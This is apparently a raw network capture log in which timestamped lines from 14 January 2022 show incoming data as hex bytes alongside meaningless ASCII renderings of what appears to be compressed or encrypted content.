              2022-01-14 10:26:09 UTC519INData Raw: 01 0f e7 0c 60 c4 fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60 de aa 1e 44 13 fe 63 20 54 c7 4b 61 40 08 85 e0 bc eb 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95
              Data Ascii: `fPlDug)c!OyaPYQ5fi.++<i2<qX;`Dc TKa@HGo35w7]UA/faQk:c-Pp}x Hhw`rIr|^Or)-./hr?
              2022-01-14 10:26:09 UTC520INData Raw: 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95 c9 4f 68 b2 12 6a bf 6e b0 14 6d 36 32 38 09 1e 55 5c d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23 de b2 15 f0 9d a3 b2 17 e8 93 dc ad 8d de ad 9a 56 de a9 b0 11 ff fc 73 05 0a 9f a9 a5 b0 07 15 ef
              Data Ascii: /faQk:c-Pp}x Hhw`rIr|^Or)-./hr?Ohjnm628U\5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#Vs
              2022-01-14 10:26:09 UTC521INData Raw: e0 bb be 6b 4c 55 a7 b0 15 ef ff cc 00 b3 68 f1 7a 60 74 99 20 99 af 8e 5e 26 84 74 77 ae 69 ce b7 e0 c7 bf c8 db 5c bf 0a 88 ca 0f f1 0f 18 63 ee 90 a5 14 72 0b 4e e4 60 8b 8a e1 5e dd ca 6f 3b 70 f5 24 c2 80 1d 48 44 10 14 f0 f8 76 e8 3f 4c f0 15 c8 a6 47 ec f7 6c cd 57 f8 48 9c 43 5c 13 c9 38 75 cb 9e c0 c7 fb e6 f4 9f 0f e4 71 3d 6a 97 5a db 59 fc 65 56 59 f8 13 20 fc 00 5c 53 0e b1 2b d9 3e b5 ff 06 ef 19 07 ce d0 27 0b e2 e2 48 1f 1e 22 cb 73 1e 9c 44 ec 84 3b 12 9b 72 f7 10 09 39 e2 5c af f4 93 65 38 7b 68 c9 58 03 c9 54 db fa c0 9b 14 ca 1f df 68 c2 36 1b 36 94 57 7a 59 32 ee 68 db f1 ca 69 be be fd a5 e3 7d e3 1c 03 bd fc 94 89 39 79 b2 cd 90 2b 59 5d 8c 72 f9 8a 07 4a 0d ec 6d e4 fa 87 f8 bf 77 6b 75 ca 26 54 3a 26 9f 8b 6c 83 1e 93 dc 53 14 ac
              Data Ascii: kLUhz`t ^&twi\crN`^o;p$HDv?LGlWHC\8uq=jZYeVY \S+>'H"sD;r9\e8{hXTh66WzY2hi}9y+Y]rJmwku&T:&lS
              2022-01-14 10:26:09 UTC523INData Raw: fa 73 0e 7a ed 1f d8 d1 e6 57 c1 7f f5 f3 86 cc 78 67 a4 9b 64 ab 9d ab c5 e6 4d d6 2e 83 58 c3 7d 0b a2 a4 84 8e c7 e9 81 f1 12 78 50 98 21 01 ca 6a 36 34 36 36 c1 81 14 ba 24 85 cc c2 f6 6d 45 68 a1 dd 80 b9 57 53 7d 12 d4 32 c1 ed a6 e1 09 1d de be 84 73 07 6a 3e bc df 2f a7 ad 19 92 30 f6 ed c0 c2 f4 74 9b 34 ed ca ad 3c a1 99 de b1 91 6b 12 52 ca 7b b1 a2 22 5d 49 f3 ff ea ad 47 b1 bd 60 d4 c0 b4 db ef bf dc 78 87 f3 f7 e6 aa bb d1 f5 56 6e a2 2b a3 bc 1f 8c 28 22 ee 39 8f d2 d5 40 7f 99 bf 06 22 fc 7f e9 11 ff 0c cf 83 88 fb 21 c5 6b 3f 9d e3 ff 64 fe c8 65 25 d7 25 db b7 ef 61 c6 73 ac 01 1e 5b 5c 48 9c 52 2d 1c 9b d2 d6 a4 3c 8c 3b c4 df bd be 9f a5 bd 63 3b d1 0e e7 83 75 66 a7 bc f9 fa 8c 95 96 d8 7a fa 6f 32 3c 19 85 8c 9b 54 13 8c 70 96 45 b3
              Data Ascii: szWxgdM.X}xP!j6466$mEhWS}2sj>/0t4<kR{"]IG`xVn+("9@"!k?de%%as[\HR-<;c;ufzo2<TpE
              2022-01-14 10:26:09 UTC524INData Raw: 89 db 26 43 8b f8 12 11 5d e5 a5 9c 2d b8 0b e8 86 79 04 14 dd 03 1c 4a eb 8b e5 05 30 83 3f b6 0d e9 01 80 25 82 5b e9 d0 f6 7d 01 0f 0e f1 cd 42 92 93 d5 42 0d f1 0b 66 2f 16 c5 aa 1f cb 47 63 55 3a 7b 69 f0 4f 61 53 73 0c 45 df bf 2d 17 56 cc db 29 b5 7a 5e 4c f2 d6 73 0d f0 95 dc f4 a6 f8 b1 1d 64 a7 b9 62 b7 dd f9 78 c7 f7 47 78 83 eb 1b 02 ea eb dc 1b 1f ca cd 47 6a b1 77 ef 4b d6 0f 8e 43 91 da 17 79 ab cc 70 26 29 b4 17 f6 07 9a e9 fe f1 c0 90 41 90 5b 97 c1 7b 2c 99 08 e3 37 95 c7 8b dc 81 07 9f 00 e4 8a 66 a1 51 27 9e 3b 06 3b e9 00 82 70 1c 31 d0 77 8a d0 aa 11 e2 ab a8 e8 25 3c cc 66 38 0a 93 c4 c9 fd 41 d1 96 86 ec 9e 26 59 9b 29 53 09 aa da 3a 16 7a 98 f5 19 18 03 bc 3e 8a 7a 80 6e 5a 96 13 d1 da 07 98 47 72 90 ea 5d f3 2c ac d1 9b db 3d 9c
              Data Ascii: &C]-yJ0?%[}BBf/GcU:{iOaSsE-V)z^LsdbxGxGjwKCyp&)A[{,7fQ';;p1w%<f8A&Y)S:z>znZGr],=
              2022-01-14 10:26:09 UTC525INData Raw: ab 2a 2a 3d 90 46 f5 f0 92 5f d1 c9 4e e9 00 84 93 fd b6 c2 73 d5 4e e5 09 12 48 eb 35 e9 bd c4 e3 2e 29 a2 0a 1c 5d 4f c1 dd 4e f5 f8 72 ec d8 65 16 cc 1f af 87 fb e7 fa 7b e4 34 81 45 13 f7 ee 93 25 b2 84 a8 85 3b e7 0a 8c 70 64 c3 67 c3 fa a9 c7 50 f0 97 1a 79 ed 00 06 3a 6e ac 03 01 5d 4b 63 cd c9 ef 79 19 fd f6 cc ce 7b 6c 0e bb a9 b3 84 7b a7 bb 25 73 b3 32 ae 07 15 e7 06 7c d1 08 59 e5 90 44 16 6f 5c a0 6b 80 ef c1 bd 7c 8f d6 ad 6f fb 57 f3 3a c4 f4 7b 0f 4f 69 04 7b ab 24 c2 fc 65 33 39 98 89 d9 ac ac d3 4c fc 76 53 c7 7a 37 30 e7 ac 16 75 06 15 1b a8 cb f1 c1 d5 4f 6a b7 81 a7 79 4e 7c 42 b2 0a 89 e2 f3 df 3a 0f 54 14 ad 85 e0 be fd 8b 91 99 1a 95 b5 90 4a e1 aa 11 14 1f 70 2c 52 e8 8d d7 c9 52 7d 38 b2 c3 2d ba ea 80 44 b6 bd 91 44 b2 41 9d a0
              Data Ascii: **=F_NsNH5.)]ONre{4E%;pdgPy:n]Kcy{l{%s2|YDo\k|oW:{Oi{$e39LvSz70uOjyN|B:TJp,RR}8-DDA
              2022-01-14 10:26:09 UTC527INData Raw: 54 44 b0 68 bc fe 68 d8 9e c3 e5 89 58 a5 a4 21 dd 9d 56 dc a1 1f 17 60 d2 ca d4 cf 79 0d 38 b0 d5 9b c5 7d 15 86 1f f7 43 18 dd f2 76 86 67 ed 00 79 73 88 ea 01 09 1d c4 0e 51 db 60 69 ed da a6 33 b7 41 1d d1 f5 55 95 14 64 bb 6b 5a 6c 04 b1 2b 09 c9 41 8b e6 aa 01 ff c1 c6 2b 72 8b fe 77 35 07 28 c3 cd e3 9f b8 15 f2 04 76 db 85 56 14 d1 56 c0 e2 05 72 1c f2 d0 02 26 57 41 9d 71 79 5d fd 4c 5a a7 b3 9f ad 88 7f b7 68 16 af e3 2c 25 d0 91 55 a9 b6 db 85 b0 08 86 70 c2 b4 cc c6 75 94 15 f6 64 a9 7a 45 1f c2 73 d5 1f df 3f 9a 1c 33 fe fa c0 5f 12 7d 18 7d 6e 94 7a 7b ae a7 f7 e8 97 c9 d1 28 41 81 51 af d9 26 54 d6 d6 01 26 10 d1 f6 2a 22 56 c2 0c 3c 31 4e 4d a7 e5 0c 70 8e 92 37 63 b9 ec 4a 7c 88 7c 96 b0 60 d7 6f b3 3b 42 0f ef 16 90 e8 e1 2b 20 e4 50 f6
              Data Ascii: TDhhX!V`y8}CvgysQ`i3AUdkZl+A+rw5(vVVr&WAqy]LZh,%UpudzEs?3_}}nz{(AQ&T&*"V<1NMp7cJ||`o;B+ P
              2022-01-14 10:26:09 UTC528INData Raw: 1f c7 ab 83 5c e8 ff 2b 9b c5 74 82 6b 84 eb 7a 40 36 20 49 77 16 06 9d 40 87 80 9a 1a 29 44 08 20 7e f6 c5 45 7f ee 8f cc 7c 1c 2e fa 4e ea 8e 4f 71 66 a3 4f f8 1a be b4 60 2b a3 00 ba 96 8f e6 89 f2 70 82 a7 37 fc db 0a 95 d2 d5 52 9f a4 db bf 1d 30 6a c3 8f db a5 91 bb c9 6b 35 a3 b7 89 4d fa 15 24 74 8a 78 95 cb 2b a6 c3 b1 f5 18 d5 2b 56 ca 45 59 34 99 e2 ba e6 9b d7 92 fc 0f 3e 22 53 75 03 16 00 9a fd 3e 7f e3 2d b5 82 83 af f5 9c fd 87 f0 83 ec 79 4a 9a 96 66 4d 2f d0 2e e4 f5 82 ef f6 1b c4 91 d4 c3 fa 50 86 93 f6 e4 94 3a d9 0c 76 8f c6 fa 9a 8b 03 04 30 15 ee 85 eb 06 5a f1 fe 53 cd 44 76 27 e6 85 e7 0e 64 57 2d 5e d6 73 2d b5 9e 21 d0 61 79 6a 23 ec 6c 92 c1 68 c4 26 60 cd 53 74 90 23 52 84 88 70 16 41 7a a0 fb ca cd 44 1c 5f bf 04 6b 3d 26 7d
              Data Ascii: \+tkz@6 Iw@)D ~E|.NOqfO`+p7R0jk5M$tx++VEY4>"Su>-yJfM/.P:v0ZSDv'dW-^s-!ayj#lh&`St#RpAzD_k=&}
              2022-01-14 10:26:09 UTC529INData Raw: f1 1b ab 2b 9d af 9b de b2 f5 73 b0 12 e4 89 9d 28 01 6d ea a2 39 82 7b 04 6e e7 ea 91 7b 21 a5 76 88 88 25 d8 7e a4 2e 27 c7 5c 2c 6c 41 9e 95 50 99 13 f6 9a 0a 81 52 f6 03 d2 fb f5 f8 6b 3e 83 21 3f 91 58 00 e5 e8 1a 44 e7 c2 e7 89 e5 70 2a 18 7c 86 62 a1 52 a3 31 b1 6a 26 49 d3 56 af 14 5d 54 ce c9 46 02 45 d2 d2 57 6e d7 9a 66 d2 4e d2 3e dc bd be cf 5b 51 69 31 49 a1 19 e2 31 03 74 47 43 67 e7 05 aa 1f ad 2d 82 6b 38 1c 45 f6 2e 9d b6 c0 44 6c 23 80 7f e1 e1 46 14 2d b8 7a 45 9a 53 73 17 13 fc c5 63 4c 51 45 6a b4 0c 7a 62 71 be f0 36 00 83 e5 1d da 24 6f 45 83 c3 c0 eb 70 57 72 9a 5d 54 c4 1e 13 1d d7 f3 c5 66 ab 81 ef 89 f1 ec c7 51 c7 41 f0 46 c1 65 22 4e f5 19 a2 c5 75 a2 0f f8 7a 90 45 a9 ac fd b7 8d 6b 1c 56 cf 52 ec eb ac 52 0a 87 62 af 15 5c
              Data Ascii: +s(m9{n{!v%~.'\,lAPRk>!?XDp*|bR1j&IV]TFEWnfN>[Qi1I1tGCg-k8E.Dl#F-zESscLQEjzbq6$oEpWr]TfQAFe"NuzEkVRRb\
              2022-01-14 10:26:09 UTC531INData Raw: 33 b6 79 73 10 ae 5b 4a ec 63 98 f5 83 f8 69 e7 84 1b 07 9f 50 a6 57 ad 63 21 d4 c5 61 f7 4a 64 c9 1e 2e e4 dc 67 2a 6a a7 54 80 a4 20 9f 78 09 05 6a f3 83 65 7e 59 4d 38 0a 60 94 db 25 0c a0 be fe 0a d9 4b ff bc 75 0c 24 50 09 47 f9 fa d8 6a 29 bb 02 c9 2e fd be 78 8a 36 3b 66 ea 4b 61 c1 e3 a0 2b d7 63 52 32 72 0b e8 c1 7a 6e e1 f2 6c 19 61 c9 41 f5 be 90 df 76 1a 41 d7 21 2b f0 14 79 c1 f4 61 8f c2 82 3e e0 79 38 d7 5f 54 97 70 74 87 61 bb 1c 84 b8 6b 6b f0 50 a7 7b 18 3a 92 c9 49 72 99 d9 c7 b9 fd e7 04 9f b0 d8 7e 82 1f 8b f8 a0 75 08 9c 74 fc dc 0a 22 16 7f 62 ac 61 59 31 51 00 88 77 04 8c 9c 29 3d 26 f6 07 1f 8c ca 3d d8 c4 69 8a 81 41 a3 4e 51 49 95 05 3c e4 26 7f 06 4e c4 ba 88 92 95 7a 79 14 71 60 38 da 97 af 39 29 9c 38 02 83 af 86 69 ce 50 64
              Data Ascii: 3ys[JciPWc!aJd.g*jT xje~YM8`%Ku$PGj).x6;fKa+cR2rznlaAvA!+ya>y8_TptakkP{:Ir~ut"baY1Qw)=&=iANQI<&Nzyq`89)8iPd
              2022-01-14 10:26:09 UTC532INData Raw: 2a 33 c6 9a 1a f4 c2 0d 37 8e a0 f0 7e 74 52 4e 12 c7 c0 be 11 34 86 22 e6 54 53 72 89 fc b7 93 32 ea 48 ee 80 7e 6c 1a d3 50 ee 86 8b 5e 7b 57 ab 2e 8d 7d b4 e7 97 4b f3 e3 ce 0b 1a b3 32 c1 8c dd c5 cf f0 a5 f6 c3 d7 89 be 64 7f ca 15 ec 65 fe 4a 12 cd 6b 7b e0 1e 4b bb da a8 45 7e 91 dc 8c 22 50 e3 e9 b2 85 42 96 0e 6f 69 6c 46 cf 10 db de 44 5b 5e d7 39 e3 5b 43 e7 48 f9 e0 b9 ea e6 78 43 d7 26 43 9a 24 41 3f 41 80 60 24 ff d9 5b a1 08 97 2c c9 b1 4c f6 6c a1 9f e6 9e 22 38 fa 14 46 92 2b ba fd ad 97 cf 33 a7 31 f9 e1 38 fc db e6 79 b4 19 ee eb 45 1f 35 60 a3 43 4a e7 4b 07 fb 2d c5 1b be f0 9b 91 cf 56 97 d4 2c fe 81 8a 17 e9 32 6c bc f8 9b b8 7e 48 6f 92 04 94 2f 40 8a 97 bc f0 9d c1 71 bc b9 71 1a e8 34 58 11 50 2a 58 d1 5c cc 92 22 1d c5 80 95 5d
              Data Ascii: *37~tRN4"TSr2H~lP^{W.}K2deJk{KE~"PBoilFD[^9[CHxC&C$A?A`$[,Ll"8F+318yE5`CJK-V,2l~Ho/@qq4XP*X\"]
              2022-01-14 10:26:09 UTC533INData Raw: 3a f3 8d 48 12 51 df a8 49 9a 8b 8f 3b 93 26 f8 04 ee 69 b5 aa 1f c3 75 da a4 6b 5e 01 ba 85 93 d3 44 1e 14 0c df 9d b7 fa 68 bf 6e b9 67 33 2c 9f ec cb ff 1d 34 eb 7a 95 df 5d 3c bd b1 ea fe 77 0e 7e 9a 40 14 68 de a4 31 a2 d5 f7 87 95 d1 4c 70 82 76 95 c9 9f 22 22 aa a8 3e 6a b8 00 cb 17 4f 96 f0 0f 24 0e 50 da 42 33 da 4e f0 f6 8e 16 07 5f fb 92 48 e7 7e 80 6b c3 76 8a 20 2f f1 1a 12 6c d3 4d eb d9 2a 37 64 08 00 f4 76 88 1a 2d b1 8d 65 36 27 9c 39 d4 b3 6a 5c 4a 90 5a d4 b0 71 07 71 06 88 6b 98 ee 18 c2 f0 87 ef 1c 18 26 db 73 f1 d3 72 a7 04 fc c2 c9 3b 63 35 14 74 2c 33 a7 bb 01 e1 64 cf 89 e8 ff 24 b4 16 7b 12 be eb 0e 60 d7 25 a2 f8 95 d2 da af d0 c1 63 21 db ce 7c 19 f9 f8 78 d4 c1 00 3d 5e 62 b5 96 5a d4 c0 ce 8f dc b1 65 f5 96 2a 44 f9 1f 7e 9d
              Data Ascii: :HQI;&iuk^Dhng3,4z]<w~@h1Lpv"">jO$PB3N_H~kv /lM*7dv-e6'9j\JZqqk&sr;c5t,3d${`%c!|x=^bZe*D~
              2022-01-14 10:26:09 UTC535INData Raw: 5e da ba 76 b5 cd 53 72 9f b5 f9 00 60 e4 95 de b3 ef 4a 0e 86 51 71 08 8d da cd 13 e3 30 cf 1a 37 cc d3 02 82 83 40 0d f1 0c 6f 5c a4 33 00 e1 33 b0 45 69 7b 1f 3b 76 a0 3f 9a 59 2e 4d 6c 5e be ef 1c a9 51 76 82 62 b0 70 85 16 3b 91 c7 c4 b5 98 5d 55 16 01 40 0b b2 e1 c4 24 55 47 67 2f b1 6e 18 78 9a 2d 1c 6b aa b9 c9 25 2d 76 8d cf 53 72 e1 24 1c 0f e9 0a 69 c2 2b a4 31 b9 72 5f e9 0c 0a 8d ba a5 ac 0b a8 31 51 1e 5b 29 56 63 36 35 a0 22 3d 87 45 3a 0d ea c2 ee c6 95 25 24 48 f4 79 1f ab f5 18 82 ac 7b 1e 50 18 cd da d4 c5 61 5e c8 dc be f1 b3 1e 8e ec 24 1b 55 a9 4c cd 54 cd 43 f9 0d 36 24 41 90 4d 09 7e 8b f1 45 6d 33 49 92 6f 30 22 5e 0b 6c ce 59 9c b3 f4 67 21 c9 47 74 90 1f 9f 61 d6 fd 12 52 b8 a7 f6 f2 a0 67 d1 68 fa fa 84 52 57 d0 4a 1d 4d f2 5e
              Data Ascii: ^vSr`JQq07@o\33Ei{;v?Y.Ml^Qvbp;]U@$UGg/nx-k%-vSr$i+1r_1Q[)Vc65"=E:%$Hy{Pa^$ULTC6$AM~Em3Io0"^lYg!GtaRghRWJM^
              2022-01-14 10:26:09 UTC536INData Raw: 45 04 76 12 60 db 21 dd 4e fe 65 45 71 05 49 70 78 6a e1 2d ab 8f a3 54 2a 35 bd 6a ac 7b 1e 63 44 07 10 f1 9d d2 23 31 fc 79 19 f6 15 0f 1b d0 d8 ad 92 2a 9f 08 c3 75 0e 63 e6 89 9d b3 2d 7e db 27 cc c5 ba e4 82 6a 52 25 9a 4a e2 b0 ee 3a 5e c6 e9 18 6f c2 9b de a2 d3 fb 8d 94 53 1e b2 e2 b5 98 4e e2 d1 43 6c dd 35 a2 7d 16 98 2c c6 9c cc 67 22 55 55 4c 97 c7 8d a0 39 89 06 49 19 2e 9b 79 7d fb 04 8a 6c a2 3c 69 3a 04 fb f9 ed f1 ce 05 03 0c 75 1d 67 9a 49 09 02 89 b5 96 4f 21 7c 75 eb 02 9d af 8b a8 38 7a 92 04 f2 64 be 63 92 2e c0 0a 30 33 b8 16 03 e5 a3 66 ba ef 0e 80 bb c2 ea 99 cf a4 ee 38 08 9f a7 47 c5 75 0c 73 0f 83 a0 2d e6 83 a1 af c5 6e ea 9f e1 30 d1 b5 8d c0 e6 90 2a c4 1d c0 f9 e3 28 42 50 e2 de 0f 31 67 3d 8e 40 19 e6 86 6a 03 d1 51 6b 27
              Data Ascii: Ev`!NeEqIpxj-T*5j{cD#1y*uc-~'jR%J:^oSNCl5},g"UUL9I.y}l<i:ugIO!|u8zdc.03f8Gus-n0*(BP1g=@jQk'
              2022-01-14 10:26:09 UTC537INData Raw: a1 ad cd 51 9d 78 c3 61 52 e0 c4 83 ed 78 47 7d 18 e2 3b 55 0e 62 47 ba 6d 5f b7 66 e6 80 62 a8 47 6f ff 87 ee 93 9e 3b 75 ae 05 6a 55 b6 5b 53 73 00 ea 95 91 aa 08 87 08 67 64 a9 b7 94 2c 4d 6f c4 f1 03 03 4f 69 d3 81 ce a9 59 be b9 78 9e 2f d1 57 92 28 3a 0d 13 05 43 89 f6 6a dd 4f 6c 21 c5 78 91 2a 8c 2b a2 25 d6 e1 3f 8c 7c 94 2c 35 b0 d1 45 61 13 f8 28 38 e6 77 44 09 1d c7 26 31 a7 00 59 55 4a 3a b0 a9 f6 6d df 5a 77 65 dd 99 94 4b 71 02 eb 0c 69 55 5e c2 b9 6b cb e9 ee e7 fe 8a 20 42 04 86 16 66 a0 53 71 00 70 2e 79 07 13 f2 10 11 eb 89 e6 92 43 de a2 c3 ab bb 15 0b 17 b5 8c 75 03 76 92 7b 63 20 42 ed c3 33 b8 1b c9 28 4d 7a 9c 31 a2 24 b7 61 13 f9 e3 3c 5c dd 23 cd 48 86 72 1b 1a 51 63 73 0d 06 69 79 0e 6e af e2 c4 fe 4d fa 7c 9b 29 0f b9 65 25 db
              Data Ascii: QxaRxG};UbGm_fbGo;ujU[Ssgd,MoOiYx/W(:CjOl!x*+%?|,5Ea(8wD&1YUJ:mZweKqiU^k BfSqp.yCuv{c B3(Mz1$a<\#HrQcsiynM|)e%
              2022-01-14 10:26:09 UTC539INData Raw: 7b 33 6a 0b a5 fd 1d 1f c4 04 f0 d5 3a 15 24 21 aa e3 91 bf 65 0f 0f 34 4c 02 22 46 9f 4c 0e 03 74 81 f4 89 06 b0 60 dc ad e2 fb f2 7b f9 e8 8d bb 6b 08 39 34 70 e5 f3 40 15 07 ba e1 c0 98 a6 49 ce 8c 1c 24 55 6f e5 83 b4 6b cd 91 dc 57 21 32 4f 18 03 08 ab 68 0d f7 4a 6c ee ef e7 72 7e f6 09 63 23 ea 7b b2 1b 27 be 1d b7 f7 8d ce f2 87 44 5e bd 6d 3f ca 99 26 6b 64 1d 18 db 07 03 fc 32 da 4a 79 8d 60 a7 44 10 be fe 09 1b db 2b d3 b8 48 87 3f 1f 60 78 94 33 a5 ae 79 8b 45 63 31 a9 c7 07 5d 5f 40 11 f1 60 24 ab 8d d6 af 86 16 3f 64 71 04 93 c4 ed 1e f5 46 fe 7e 7c c2 8b 06 18 b9 81 ea 87 a2 35 cf 88 77 05 11 55 3b 71 fc 7f eb 19 f6 30 52 e0 d1 8b eb 12 98 f4 72 94 4b 79 6f 2b a4 98 59 48 5e 9c 20 4f 6c 4f c4 e4 64 bb 68 fb a8 dc 50 26 51 7d 1c 57 4d 58 1d
              Data Ascii: {3j:$!e4L"FLt`{k94p@I$UokW!2OhJlr~c#{'D^m?&kd2Jy`D+H?`x3yEc1]_@`$?dqF~|5wU;q0RrKyo+YH^ OlOdhP&Q}WMX
              2022-01-14 10:26:09 UTC540INData Raw: dc 70 9a 52 1d 23 36 56 db 33 ef 9e f5 ff 74 47 ee ca 9e d9 88 63 d8 07 0f 1e e9 0e 0a 65 f9 91 a2 ce 41 8c f0 40 98 fc 66 b1 8a 6e cc e2 bf 66 7d aa 6a 1e f7 b0 7f b2 ee 4b 78 f5 1b a6 bf 1e 08 d0 8e 10 2d ed 51 14 34 2e 13 17 71 4f 09 18 64 fb ae 42 e4 ae 55 cd 57 e4 cb 3d f8 75 77 f1 0a 6a 11 88 92 eb 3c 08 93 c4 50 48 ac 75 d3 e6 d0 a6 36 39 8c 35 dd 4c e7 b5 92 4d 7d c4 47 6a fc cf 30 44 d9 31 3f 7b 5a 03 3d 69 cd 65 53 83 f9 4d 61 b8 19 f1 1a a1 73 7d ed b1 eb 6a 73 29 c0 a8 35 ad 9e 20 b5 07 5c d1 5b 5b 9a 72 f8 07 e1 75 26 bb c2 c9 cb ed f9 96 44 19 e6 6d 67 a5 4a aa 83 14 31 3e ec d6 27 2b f3 58 90 b5 66 fd f9 ea 91 dc 3c d5 5b 4c 0a dc d7 da 78 b4 76 61 20 ac 65 74 90 41 89 ef ff 53 1c 2e 4a e2 f7 90 4d 6d a6 84 09 c2 45 14 95 c3 78 9c 2f 46 37
              Data Ascii: pR#6V3tGceA@fnf}jKx-Q4.qOdBUW=uwj<PHu695LM}Gj0D1?{Z=ieSMas}js)5 \[[ru&DmgJ1>'+Xf<[Lxva etAS.JMmEx/F7
              2022-01-14 10:26:09 UTC541INData Raw: 1d cd 4d 69 82 b8 1a 44 ba 56 ab d2 d2 a6 2d b3 83 84 0f f0 86 dc 15 fb 83 0a 7d eb 05 04 98 33 b0 6d 27 c7 51 86 14 9a 21 cd ae 92 4c f4 37 8d b5 92 48 17 5a 2c 39 85 eb 61 ae d7 d5 38 01 79 84 6c b4 e6 fa 9b ad 87 dc 39 9c 38 fc d8 c6 18 d2 2e 45 29 8e 44 05 19 82 63 ea 01 07 16 a1 20 8d 34 13 a2 93 ae ed 10 b7 9c 4f 72 85 fe 00 e9 92 7e d1 53 77 0e 60 33 62 a2 27 c9 49 0e 08 6a 45 6a ae 18 68 ab 19 20 4a e5 41 99 c3 71 12 8a 8d cd 5a dd 3d fb 90 bf 9e 2a 27 ca d5 44 7f 33 a6 28 3b 29 68 ab 9e 58 ab 9b 82 ac 06 97 29 d3 cb 2c da 76 9f bd 77 0a e6 81 96 8f db 2f 4d 9f a4 24 57 4e 9f b3 30 9d a1 a6 57 bc 03 1c 40 1b cb b6 b8 13 92 b3 3c 1e 55 49 6c c8 c5 e1 95 cb 53 8a 3b e0 6c 07 84 88 89 fe 6f 37 84 0c 30 a4 59 58 5b 61 5d 4c 27 60 ab fd fd 53 58 ce d3
              Data Ascii: MiDV-}3m'Q!L7HZ,9a8yl98.E)Dc 4Or~Sw`3b'IjEjh JAqZ=*'D3(;)hX),vw/M$WN0W@<UIlS;lo70YX[a]L'`SX
              2022-01-14 10:26:09 UTC543INData Raw: 86 d8 9e f0 e3 85 7c 4d 0a 44 71 c6 16 05 78 41 40 8d 6d 46 55 5b 59 05 8f 53 99 5e d8 2e 0b b7 c5 7e 04 c0 0a b4 fc 25 2b 4b e1 1f 45 4e 26 f1 ea f9 8f 69 1c 62 a1 47 00 75 d6 4c 33 c4 43 84 85 74 f1 ac 94 92 26 98 f5 ff 08 84 52 39 a0 2f 86 af 0c dc b0 6e d9 ba 6d 5f 8b 53 7f ee 37 26 4c a7 14 91 30 b6 4a 31 63 37 7f e1 02 be a1 63 32 33 99 cf 5c 2c 52 82 0e 01 09 37 5f c0 85 25 df f2 d8 c8 63 da c4 3f 00 8b 01 3a fb c0 2b 51 0c 9a 72 5c 59 9e 82 d2 e8 c2 0b 36 4b 7f b3 28 97 1d d9 5b 6b b2 15 ae 1e e4 71 7d 25 96 b1 a8 89 42 3d df ec 62 28 79 78 54 21 c2 68 a4 3b d3 84 41 36 80 2b 86 b0 b4 cf f4 02 4f aa aa ac a9 6a ce db 1b 27 e4 36 ce d5 f7 e4 a3 45 a3 fc e3 cb 97 dc c7 2b 4a 70 f0 df 99 1e fa 2e c3 fe 18 11 0c 50 61 0e ca 71 29 0b 57 0f bd 25 d5 dc
              Data Ascii: |MDqxA@mFU[YS^.~%+KEN&ibGuL3Ct&R9/nm_S7&L0J1c7c23\,R7_%c?:+Qr\Y6K([kq}%B=b(yxT!h;A6+Oj'6E+Jp.Paq)W%
              2022-01-14 10:26:09 UTC544INData Raw: a4 f3 c0 85 11 f4 13 0e 30 57 99 ca 9b c2 69 81 bf 29 2f f0 6b f7 82 31 ae 5f 5a a7 be e5 5b 41 9f b0 1c 0d e6 db aa 02 8b e0 bf 6b b9 c6 8e 48 e4 8d ca d4 50 62 aa 10 b4 a2 43 60 c7 95 61 1b 9b 29 b4 ef cf 36 c2 88 24 4e 96 27 8d de e1 3d 0a ec 82 61 f7 56 ad 56 c2 f0 96 e4 cc 17 18 75 4f 79 ca c2 ea 6b 59 2c 58 aa 60 94 49 9d c7 5f 5d ab 2c 54 8e 54 c8 c9 42 03 0d ae 07 6c ad 85 9d f6 72 c1 c3 63 26 52 f6 6a 53 dc c3 77 64 6c af 96 85 6d fe 82 7d b3 2a 78 25 89 36 b3 d5 1e 8a a2 a9 71 9e c2 87 bb 63 8f c6 fc 8f 69 42 7e f6 05 4d 72 2d c8 db 31 6c 3c 66 fb 45 76 95 c8 cc c2 6f 8f 92 15 36 ce d7 d6 01 70 72 21 aa 56 39 58 cd f2 73 1c 57 4a be ac 89 10 0b 80 88 b0 0b 8c 34 58 32 33 6a af e4 e3 cf 16 1d 05 2f f4 f2 7b 1b d9 4a 50 55 46 a2 32 5c d7 97 79 0d
              Data Ascii: 0Wi)/k1_Z[AkHPbC`a)6$N'=aVVuOykY,X`I_],TTBlrc&RjSwdlm}*x%6qciB~Mr-1l<fEvo6pr!V9XsWJ4X23j/{JPUF2\y
